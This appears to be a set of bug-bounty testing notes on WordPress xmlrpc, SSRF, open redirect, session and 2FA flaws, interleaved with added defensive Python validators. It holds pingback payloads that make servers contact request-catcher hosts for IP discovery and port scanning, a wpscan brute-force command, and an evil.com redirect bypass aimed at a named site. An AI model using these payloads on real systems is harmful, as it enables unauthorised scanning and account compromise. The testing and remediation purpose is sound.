Impact: DoS, cross-site port attack (XSPA), SSRF

<?xml version="1.0" encoding="UTF-8"?>

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value><string>https://postb.in/1562017983221-4377199190203</string></value>

</param>

<param>

<value><string>https://thefreecat.org/</string></value>

</param>

</params>

</methodCall>

https://www.postb.in/ { you will get response in this site }

[ OR ]

<?xml version="1.0" encoding="UTF-8"?>

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value><string>http://hr03rl6g.requestrepo.com/</string></value>

</param>

<param>

<value><string>http://localhost/wordpress/?p=1/</string></value>

</param>

</params>

</methodCall>

https://requestrepo.com/ { you will get response in this site }


Finally , we can capture the server’s real IP address even if it is behind a proxy or firewall or web
firewall , CDN etc..

Port Scan :

<?xml version="1.0" encoding="UTF-8"?>

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value><string>http://hr03rl6g.requestrepo.com:21</string></value>

</param>

<param>

<value><string>http://localhost/wordpress/?p=1/</string></value>

</param>

</params>

</methodCall>

Note: change the port number (21 above) to scan other ports.

Note 2: If the response contains a fault code with a value greater than 0, the port is open; you can
verify this by checking your server logs.

Remediation:
If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any
potential risks. Otherwise, it should at the very least be blocked from external access.
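Where xmlrpc.php must stay enabled, the requests shown above (system.listMethods, demo.sayHello, pingback.ping with a non-web port or an internal target, and system.multicall used for brute-force amplification) are all recognisable on the wire. The following is an added example (not from these notes) of detection logic a WAF rule or log pipeline could apply to an xmlrpc.php request body; the sample bodies are constructed, modelled on the payloads above but with placeholder hostnames. Any body carrying a DOCTYPE is rejected before parsing, since XML-RPC never needs one.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LOGIN_METHODS = {"wp.getUsersBlogs", "wp.getPosts", "metaWeblog.getUsersBlogs"}


def _is_internal(host):
    """True for loopback/private/link-local literals and obviously internal hostnames."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host.lower() == "localhost" or host.lower().endswith((".local", ".internal"))


def classify_xmlrpc(body):
    """Return a list of finding strings for one xmlrpc.php request body (empty = nothing notable)."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return ["xml: DOCTYPE/ENTITY present, rejected before parsing"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["xml: malformed"]
    findings = []
    name = (root.findtext("methodName") or "").strip()
    strings = [(s.text or "").strip() for s in root.iter("string")]
    if name == "pingback.ping" and strings:
        source = urlparse(strings[0])           # first param: URL the server will fetch
        if source.port and source.port not in (80, 443):
            findings.append(f"pingback: non-web port {source.port} (port scan / XSPA)")
        if _is_internal(source.hostname or ""):
            findings.append("pingback: internal source host (SSRF)")
        if not findings:
            findings.append("pingback: outbound request to caller-chosen host")
    if name == "system.multicall":
        calls = [s for s in root.iter("struct")
                 if any((m.findtext("name") or "") == "methodName" for m in s.findall("member"))]
        findings.append(f"multicall: {len(calls)} calls in one request, brute-force amplification")
    if name in LOGIN_METHODS:
        findings.append(f"{name}: credential-bearing call, candidate for brute force")
    if name == "system.listMethods":
        findings.append("reconnaissance: method enumeration")
    return findings


def _pingback(source, target):
    return (f'<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params>'
            f'<param><value><string>{source}</string></value></param>'
            f'<param><value><string>{target}</string></value></param>'
            f'</params></methodCall>').encode()


def _multicall(n):
    call = (b'<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs'
            b'</string></value></member><member><name>params</name><value><array><data>'
            b'<value><string>admin</string></value><value><string>guess</string></value>'
            b'</data></array></value></member></struct></value>')
    return (b'<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params>'
            b'<param><value><array><data>' + call * n +
            b'</data></array></value></param></params></methodCall>')


# Constructed sample bodies; hostnames are placeholders, not real endpoints.
SAMPLE_REQUESTS = {
    "list": b'<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>',
    "hello": b'<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>',
    "pingback_port": _pingback("http://catcher.example:21", "https://blog.example/?p=1"),
    "pingback_internal": _pingback("http://127.0.0.1:8080/", "https://blog.example/?p=1"),
    "multicall": _multicall(3),
    "doctype": b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY e "x">]><methodCall><methodName>demo.sayHello</methodName></methodCall>',
}
```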
Brute force login password: through Burp Suite Intruder

At the method name position, supply the method name.

wpscan --password-attack xmlrpc -t 20 -U <specific-user> -P /wordlist-directory/example.txt --url http://<wordpress-target>/

Find the company's security contact email to report the vulnerability:

https://jiomeetpro.jio.com/.well-known/security.txt

EXIF Metadata Not Being Stripped

Visit the target site, find the images it serves, copy an image URL and read its EXIF data with an EXIF
tool. If location (GPS) or device details are leaked, that is the vulnerability.
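The fix on the server side is to strip metadata from every image at upload time. The following is an added example (not from these notes) of a JPEG metadata stripper that walks the marker segments and drops APP1 (where EXIF and XMP live) and COM segments while copying everything else, including the entropy-coded image data, untouched. The sample JPEG is constructed in the block with a fake EXIF segment carrying GPS and device text; it is structurally valid but not a decodable image. Padding bytes between markers, which the JPEG spec allows, are not handled.

```python
import struct


def strip_jpeg_metadata(data):
    """Return the JPEG with every APP1 (EXIF/XMP) and COM segment removed, image data untouched."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    out = bytearray(b"\xff\xd8")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected")
        marker = data[pos + 1]
        if marker == 0xDA:           # SOS: entropy-coded data follows until EOI, copy the rest verbatim
            out += data[pos:]
            return bytes(out)
        if marker == 0xD9:           # EOI with no image data at all
            out += data[pos:pos + 2]
            return bytes(out)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # length includes its own 2 bytes
        segment = data[pos:pos + 2 + length]
        if marker not in (0xE1, 0xFE):   # drop APP1 (EXIF/XMP) and COM, keep APP0/DQT/SOF/DHT...
            out += segment
        pos += 2 + length
    raise ValueError("truncated JPEG")


def has_exif(data):
    """True if an APP1 segment with the 'Exif\\0\\0' header is present before the image data."""
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF and data[pos + 1] not in (0xDA, 0xD9):
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if data[pos + 1] == 0xE1 and data[pos + 4:pos + 10] == b"Exif\x00\x00":
            return True
        pos += 2 + length
    return False


def _segment(marker, payload):
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed minimal JPEG: SOI, APP0 (JFIF), APP1 (fake EXIF with GPS/device text), COM, DQT, SOS, EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00MM\x00\x2a" + b"GPSLatitude=12.97;Model=PhoneX")
    + _segment(0xFE, b"shot on my phone")
    + _segment(0xDB, b"\x00" + bytes(range(64)))
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34"
    + b"\xff\xd9"
)
```

PNG carries metadata in tEXt/iTXt/eXIf chunks and needs a separate chunk walker; in production a library such as Pillow's `Image.save` on a re-encoded copy achieves the same result for all formats at the cost of re-compression.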

2FA & multi factor authentication misconfiguration

P4 – bug

https://hackerone.com/reports/2234736
https://hackerone.com/reports/1927360

Impact :

1/ Compromised user data: If an attacker gains access to a user's account before 2FA is activated,
they can continue to access the account even after 2FA is enabled. This can result in the theft of
sensitive user data, such as personal information, financial details, and other confidential data.

2/ Financial loss: A compromised user account can also lead to financial loss if the attacker makes
unauthorized transactions, transfers funds, or purchases items using the user's payment information.

3/ Reputational damage: If users' accounts are compromised due to this security vulnerability, it can
damage the reputation of the service provider. Users may lose trust in the platform and may be less
likely to use it in the future.

4/ Legal consequences: In some cases, the service provider may be held liable for damages resulting
from the security vulnerability, which could lead to legal and financial consequences.

5/ Operational costs: Fixing this security vulnerability will require resources and time to implement
the necessary measures. This can result in operational costs for the service provider, including
development, testing, and communication with users.

6/ Regulatory compliance: Depending on the nature of the platform and the data it processes, this
vulnerability may be a violation of regulatory requirements, leading to fines or other penalties.

Recommended Solution :
Upon enabling 2FA on one device, all other active sessions associated with the same account should
be immediately terminated.
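Both this section and "Session Not Expiring After Password Change" earlier need the same server-side mechanism: every session must remember the credential state it was issued under, and any credential change must invalidate everything issued before it. The following is an added example (not from these notes) of that mechanism. Each account carries a `credential_version`; sessions record it at login and are rejected when it no longer matches, and `on_credential_change` bumps it after a password change or 2FA enrolment, then re-issues a session only for the browser that performed the change. `scenario` replays the Chrome/Brave test from the earlier section. Names and the session TTL are assumptions.

```python
import secrets
import time


class Account:
    def __init__(self, user_id):
        self.user_id = user_id
        self.credential_version = 1   # bumped on password change, 2FA enable/disable, recovery


class SessionStore:
    """Server-side session registry; each session remembers the credential version it was issued under."""

    def __init__(self, clock=time.time, ttl_s=7 * 24 * 3600):
        self.clock, self.ttl_s = clock, ttl_s
        self.sessions = {}

    def login(self, account):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {
            "user_id": account.user_id,
            "cred_version": account.credential_version,
            "issued": self.clock(),
        }
        return sid

    def is_valid(self, sid, account):
        s = self.sessions.get(sid)
        if s is None or s["user_id"] != account.user_id:
            return False
        expired = self.clock() - s["issued"] > self.ttl_s
        stale = s["cred_version"] != account.credential_version
        if expired or stale:
            del self.sessions[sid]   # lazy cleanup: absolute expiry, or credentials changed after issue
            return False
        return True

    def revoke_all(self, account):
        """Bump the version (covers sessions held in other stores too) and drop local entries."""
        account.credential_version += 1
        for sid in [k for k, v in self.sessions.items() if v["user_id"] == account.user_id]:
            del self.sessions[sid]


def on_credential_change(store, account):
    """Call after a password change or after enabling 2FA: kill every session, then re-issue one
    for the browser that performed the change so that user is not logged out mid-flow."""
    store.revoke_all(account)
    return store.login(account)


def scenario():
    """Chrome and Brave are logged in; Brave changes the password (or enables 2FA)."""
    acct = Account("user-1")
    store = SessionStore()
    chrome, brave = store.login(acct), store.login(acct)
    new_brave = on_credential_change(store, acct)
    return {
        "chrome_still_valid": store.is_valid(chrome, acct),
        "old_brave_valid": store.is_valid(brave, acct),
        "new_brave_valid": store.is_valid(new_brave, acct),
    }
```

The version check is what matters for an attacker-held session: even if that session lives in a cache the revocation loop never touched, it fails validation the moment the account's version moved on. The same works for signed tokens (JWTs) by embedding the version in the claims and comparing it against the account on every request.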

XXE

Use a file name in the format XXE.xml.

Paste the payload after xml= (URL-encoded).


OPTIONS

Come one step back also

JWT

Open Burp Suite > Extensions > BApp Store > JWT Editor > Install

Proxy > HTTP history > requests highlighted in green are flagged by the JWT Editor extension as carrying
a JWT; work only on those requests.

Open Redirection :
Common parameter names:

url, redirect, redirect_uri, redirect_url, redirect_to, redir, rurl, turl, destination, dest, next, next_page,
return, returnTo, return_to, return_url, return_path, continue, continue_url, checkout_url, forward,
forward_url, go, to, image_url, img_url, view, view_url, page, page_url, file_url, file_name, folder_url,
folder, login_url, load_url, load_file, path, link, target, ink, del, file

Common path patterns:

/redirect/, /cgi-bin/redirect.cgi, /out/, /out?, /login?to=, /image_url=, /go=, /return=, /returnTo=,
/return_to=, /checkout_url=, /continue=, /return_path=, /loginto

Example: next=https://google.com

waybackurls dishtv.in | grep "=http"

Also search manually on the site.

Firebase (page.link) bypass:

https://dishtv.in.page.link/?link=https%3A%2F%2Fsiteproxy.ruqli.workers.dev%3A443%2Fhttps%2Fwww.evil.com?https://www.dishtv.in/

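The parameter list above is long because every one of those names ends up in the same sink: a redirect built from user input. The defence is a single validator at that sink. The following is an added example (not from these notes) of one that accepts only same-site relative paths or absolute URLs whose host is allowlisted, and that explicitly handles the shapes that defeat naive `startswith("/")` or `"dishtv.in" in url` checks: scheme-relative `//evil.com`, backslash `/\evil.com`, scheme-without-slashes `https:evil.com`, `javascript:`, userinfo tricks like `https://www.dishtv.in@evil.com`, and the "our domain appears later in the URL" case from the Firebase example. The allowlist is an assumption.

```python
from urllib.parse import urlsplit

ALLOWED_REDIRECT_HOSTS = {"www.dishtv.in", "dishtv.in"}   # assumed allowlist


def safe_redirect_target(value, default="/"):
    """Return a redirect target that stays on our site, or `default` if the input is unsafe."""
    if not value:
        return default
    value = value.strip()
    # Browsers treat backslashes as slashes in URLs; normalise before parsing so "/\evil.com"
    # is seen for what it is.
    value = value.replace("\\", "/")
    # Control characters and embedded whitespace are a classic way to split parsers from browsers.
    if any(ord(c) < 0x21 for c in value):
        return default
    parts = urlsplit(value)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference. "//evil.com" never gets here because urlsplit gives it a netloc.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return default
    if parts.scheme not in ("http", "https"):
        return default   # javascript:, data:, and scheme-relative "//evil.com" (scheme "") land here
    host = (parts.hostname or "").lower()   # hostname strips userinfo and port; None for "https:evil.com"
    if host not in ALLOWED_REDIRECT_HOSTS:
        return default
    # Rebuild without userinfo/port so "https://evil.com@www.dishtv.in" becomes a clean same-site URL.
    path = parts.path or "/"
    query = f"?{parts.query}" if parts.query else ""
    return f"{parts.scheme}://{host}{path}{query}"


def check_many(values):
    """Convenience for bulk review: value -> decided target."""
    return {v: safe_redirect_target(v) for v in values}
```

Where the parameter only ever needs to select a page on the same site, the stricter option is to accept just the relative-path branch and drop the allowlist entirely.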
Weak password policy vulnerability

I am able to create an account with a very weak password like 123456.
Increases the risk of brute-force and credential-stuffing attacks.

No Email or Phone Verification


Steps to Reproduce:

1. Visit https://flightdemy.com/register

First Name: sai

Last Name: jain

Email: [email protected]

Phone Number: 9501795017

Password: 12345678 or 11111111

2. Submit the registration form

Complete the above registration process

No verification email or SMS OTP is sent

User can continue using the account without confirming any contact info

Impact:

Allows creation of fake or disposable accounts

Insecure account removal :


Impact:

This lack of password confirmation can cause serious issues:

1. Accidental Deletion: Users might unintentionally delete their accounts without realizing the
consequences.

2. Malicious Activity: Attackers with temporary access to the device or session can delete accounts
without authorization.

3. Loss of Trust: Users may lose confidence in the platform due to insecure account deletion
processes.

4. Unintended Data Loss: Irrecoverable loss of valuable user data if the account is deleted
accidentally or maliciously.

5. Security Risk: Absence of verification steps increases vulnerability to unauthorized deletions,
impacting platform integrity.

Recommendation:

Implement a mandatory password confirmation step before account deletion.

Consider adding multi-factor authentication (MFA) for critical actions like account removal.

Display clear warnings about the consequences of account deletion.

Log account deletion actions with user details and timestamps for audit purposes.
Provide an option to recover deleted accounts within a grace period to prevent permanent loss.

Inject in GET requests { parameters } and in POST requests { submitted forms etc. }

SSRF (Server-Side Request Forgery) to Trigger External DNS Interaction

SSRF is a type of attack where an attacker can make the server send requests to internal resources or
any arbitrary URLs. By exploiting SSRF vulnerabilities, attackers can trigger requests to external DNS
servers or services, which can be leveraged for various purposes like:

Parameters: url, uri, path, domain, host, website, site, continue, next, data, reference, redir, redirect,
callback, return, returnTo, page, img, image_url, load, file, file_url, open, out, to, target, dest,
destination, fetch, feed, link, src, source, navigation, proxy, port, remote, address, remote_url,
video_url, audio_url, avatar, background, api, endpoint, objectUrl

Inject after the parameter, e.g. id=http://<your Burp Collaborator URL>

In Burp Collaborator click "Poll now"; if the server fetched the URL you will see the request and, in it,
the server's IP address.

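This section and the earlier SSRF section (with its localhost/127.0.0.1/0.0.0.0/[::] payload list and the IP-converter link) both describe the same flaw: the server fetches a URL supplied in one of the listed parameters without checking where it points. The following is an added example (not from these notes) of a target validator that a fetcher should call before connecting. It restricts scheme and port, recognises IP literals in the forms the payload list uses (including pure-decimal addresses, which is what an IP converter produces), resolves hostnames and rejects any answer that is not a public address, and returns the resolved IP so the caller connects to exactly what was checked (otherwise a second lookup could return a different answer). The resolver is injectable; the fake DNS table and hostnames are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _parse_ip_literal(host):
    """Accept 127.0.0.1, ::1 (brackets already stripped by urlsplit), 0.0.0.0 and decimal 2130706433.
    Raises ValueError for hostnames and for zero-padded/octal forms, which are then treated as names."""
    host = host.strip("[]")
    if host.isdigit():
        return ipaddress.ip_address(int(host))
    return ipaddress.ip_address(host)


def _default_resolve(host):
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def check_ssrf_target(url, resolve=_default_resolve, allowed_ports=(80, 443)):
    """Return (allowed, detail). On success detail is the resolved IP the caller must connect to."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in allowed_ports:
        return False, f"port {port} not allowed"
    if host.lower() == "localhost" or host.lower().endswith((".localhost", ".internal", ".local")):
        return False, "internal hostname"
    try:
        candidates = [_parse_ip_literal(host)]
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError):
            return False, "unresolvable host"
    for ip in candidates:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is judged as 127.0.0.1
        # is_global is False for loopback, private (10/8, 172.16/12, 192.168/16), link-local
        # (169.254/16, which includes cloud metadata endpoints) and unspecified (0.0.0.0, ::).
        if not ip.is_global:
            return False, f"{ip} is not a public address"
    # Every address the name resolves to must be public; connect only to the one returned.
    return True, str(candidates[0])


# Constructed fake DNS table for offline use; the public address is a placeholder value.
FAKE_DNS = {
    "internal-app.example": ["10.0.0.5"],
    "public.example": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host):
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise socket.gaierror(f"constructed NXDOMAIN for {host}")
```

The check is necessary but not sufficient on its own: the fetcher must also refuse to follow redirects (or re-run this check on every hop), since an allowed public host can 302 to an internal address.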
Mobile Number Verification Bypass allows Registration of Restricted Country

Steps:

1. Visit the sign-up page of any website and complete the email verification process.

2. When prompted for mobile number verification, note that some websites do not list certain
countries like India (+91).

3. Select any country code that is allowed and enter a random phone number from that country.

4. Intercept the outgoing HTTP request using a proxy tool (like Burp Suite).

5. Modify the intercepted request: replace the selected country code and phone number with the
Indian country code (+91) and your desired Indian phone number.

6. Forward the modified request.

7. Check whether the OTP is received on the Indian number.

8. Enter the received OTP to complete the verification.

9. If successful, the account will be created using the Indian number. After logging in, check the
dashboard to confirm the number is linked to the account.

Missing Server-Side Validation in the Password Change Feature

Steps to Identify the Issue:

1. Go to any website's login page and log in with valid credentials.

2. After logging in, navigate to the Dashboard > Change Password section.

3. Enter your current password, and for both "New Password" and "Confirm Password," enter the
same value as your current (old) password.

4. When you click "Submit," the application will show an error saying "Old and new passwords
should not be the same."

This is a client-side validation (browser-side).

5. Now open Burp Suite and turn Intercept ON.


6. Go back to the password change form:

Enter your current password.

Set a different new password and confirm password (to pass client-side check).

7. When the request is intercepted by Burp Suite, modify the request:

Change the new password and confirm password values to the same as the current (old) password.

8. Forward the modified request to the server.

9. If the server responds with a 200 OK status and the password is successfully updated (despite old
and new being the same), it means the restriction was only on the client side.

10. If there was proper server-side validation, the server would reject the request and return an
error.
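The server-side counterpart of steps 9 and 10, as an added example that is not code from these notes: every rule the browser enforces is re-checked on the server, including the "old and new must differ" rule, so a modified request cannot bypass it. The in-memory user record and the PBKDF2 parameters are assumptions for the example.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 200_000  # assumed work factor; tune to the deployment
SALT_LEN = 16


def hash_password(password, salt=None):
    """Return salt || PBKDF2-HMAC-SHA256(password) for storage."""
    salt = salt or os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def verify_password(password, stored):
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def change_password(user, current, new, confirm):
    """Server-side validation of a password change request.

    `user` is a constructed dict with a "password" entry holding hash_password()
    output. Returns None on success, otherwise a short error string that the
    client-side check would also have shown; the order matters: the current
    password is verified first so the other checks leak nothing to a stranger."""
    if not verify_password(current, user["password"]):
        return "current password is incorrect"
    if new != confirm:
        return "new password and confirmation do not match"
    if len(new) < 12:
        return "new password too short"
    if new == current:  # the rule that was only enforced in the browser
        return "old and new passwords should not be the same"
    user["password"] = hash_password(new)
    return None
```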

Password reset link does not expire after changing the email address — leads to Account Takeover

Steps to Reproduce:
1. Log in to your account using Browser A.

2. In Browser B, open the password reset page and request a reset using your current email address.

3. Go back to Browser A, go to the account settings, and change the email address to a new one.

If verification is required, verify it using the link sent to the new email address.

4. Now, return to Browser B and open the password reset link that was sent to the old email address
(before the email change).

5. If the link still works and allows you to set a new password, this is a security vulnerability, because
the reset link from the old email is still valid even after the email address has been changed.

Reference: HackerOne report id 685007


Cache Control Misconfiguration on a Login Website

1. Login to the website using your credentials.

2. After logging in, go to the logout option and click it to log out.

3. Now, click the back button (<) in your browser (e.g., the browser's back arrow).

Expected Behavior:
You should not be able to see any content from the previous (logged-in) page after logging out. The
browser should redirect you to the login page or display an error (like "Session expired").

Actual Behavior (Issue):

After clicking the back button, the browser displays the content of the previous (authenticated)
page, even though you've already logged out.

P4 bug; HackerOne and Bugcrowd will accept it.

https://gaya3-r.medium.com/cache-control-header-is-missing-for-a-sensitive-page-168ac9f43e12

https://hackerone.com/reports/231805

https://jenish03.medium.com/improper-cache-control-vulnerability-f2604038615a

Reset password link sent over unsecured http protocol

Go to the "Forgot Password" page of any website.

Enter your email address in the provided field to request a password reset.

Check your email inbox for the password reset email from the website.

Open the email and find the password reset link inside.

Copy the URL of the password reset link to your clipboard.

Paste the URL somewhere (e.g., in a text editor) and observe it.

Look at the beginning of the URL: you will see whether it uses plain HTTP rather than HTTPS.

CVSS: 7.3 (High)

Mitigation:

Generate reset password link with secured https protocol.

Impact

If the victim opens the reset link over plain HTTP and then forgets to update the password, anyone on an
intermediate computer along the network path, or anyone running a sniffer, can read the link and reset the password.

https://hackerone.com/reports/1888915

Session Not Invalidated After Account Deletion

Steps to Reproduce:

1. Open Browser A (e.g., Chrome):

o Go to the target application.

o Log in with a valid user account.

2. Open Browser B (e.g., Firefox or Incognito):

o Go to the same application.

o Log in using the same user account credentials.

o Verify that both sessions are active and functional.

3. In Browser A:

o Navigate to the account settings page.

o Choose “Deactivate” or “Delete Account” (whichever is available).

o Confirm the deactivation/deletion of the account.

4. Return to Browser B:

o Try performing any authenticated actions:

▪ Visit dashboard or profile page

▪ Access sensitive data (messages, settings, orders)

▪ Make API requests or form submissions

o Observe whether the session remains active or access is still possible.

Expected Behavior:

• Upon account deactivation/deletion in Browser A, the session in Browser B should be
immediately terminated.

• Any request from Browser B should result in a 401 Unauthorized or redirect to login page.

Actual Behavior (Bug):

• Session in Browser B remains active even after account is deactivated.

• The user can continue accessing and interacting with the application.

• This results in unauthorized access to a deleted/deactivated account.


Impact:

• Broken session invalidation.

• Violates user expectation and platform integrity.

• The website should force a logout from all browsers after the account is deleted.

Recommendation:

• On account deactivation/deletion, invalidate all active sessions (server-side).

• Implement a session/token revocation system.

• Ensure all requests post-deactivation return proper auth errors.

Improper Session Invalidation – Auto Sign-In Without Credentials After Logout

Steps to test for an automatic login vulnerability :

1. Go to any website and log in with valid credentials.

2. Click on the dashboard or navigate to any authenticated page.

3. Click the "Logout" button — this should log you out and end the session.

4. Now, click the "Login" button again without entering any credentials.

If you are automatically logged in again without needing to re-enter your username and password,
the website may be vulnerable.

Impact

• Logout becomes meaningless, giving a false sense of security.

• If someone else gains temporary or physical access to the browser, they can easily regain
access to the account without credentials.

• Risk is amplified in environments like internet cafés, libraries, or if a device is lost/stolen.

Recommendation:

• Properly invalidate the session on the server.

• Remove all tokens/cookies from the browser.

• Set cache-control headers to prevent session restoration via back/forward navigation.

• Consider revoking refresh tokens where applicable.

CVSS: 4-6.9 (Medium)

Dust | Report #3101207 - Improper Session Invalidation – Auto Sign-In Without Credentials After
Logout (Affects Chrome & Firefox) | HackerOne
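The recommendations of this section and of "Session Not Invalidated After Account Deletion" above come down to one thing: the session must live on the server, where logout deletes it and account deletion revokes every session the user holds. The following is an added example (not code from these notes or the cited reports) of such a store; the in-memory dicts, the injectable `clock`, the `password_ok` flag (the result of re-verifying the password elsewhere) and the audit list are assumptions.

```python
import secrets
import time


class SessionStore:
    """Server-side sessions: the cookie only carries an opaque id, so invalidation
    is a server-side delete that no cached page or lingering cookie can undo."""

    def __init__(self, clock=time.time):
        self.sessions = {}       # session_id -> {"user_id": ..., "created": ...}
        self.deleted_users = set()
        self.audit_log = []      # constructed stand-in for a real audit sink
        self.clock = clock

    def login(self, user_id):
        sid = secrets.token_urlsafe(32)  # unguessable; never derived from the user
        self.sessions[sid] = {"user_id": user_id, "created": self.clock()}
        return sid

    def current_user(self, sid):
        """User id for a live session, or None (caller answers 401 / redirects to login)."""
        entry = self.sessions.get(sid)
        if entry is None or entry["user_id"] in self.deleted_users:
            return None
        return entry["user_id"]

    def logout(self, sid):
        # Removing the entry server-side is what makes "Login" after logout fail.
        self.sessions.pop(sid, None)

    def revoke_all(self, user_id):
        for sid in [s for s, e in self.sessions.items() if e["user_id"] == user_id]:
            del self.sessions[sid]

    def delete_account(self, sid, password_ok):
        """Deletion requires a live session and a fresh password confirmation.
        On success every session of the user is revoked (Browser B included)
        and the action is logged with user id and timestamp."""
        user_id = self.current_user(sid)
        if user_id is None or not password_ok:
            return False
        self.deleted_users.add(user_id)
        self.revoke_all(user_id)
        self.audit_log.append(
            {"event": "account_deleted", "user_id": user_id, "at": self.clock()}
        )
        return True
```

Pair this with `Cache-Control: no-store` on authenticated responses so the browser's back button cannot redisplay pages that were fetched while the session was alive.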
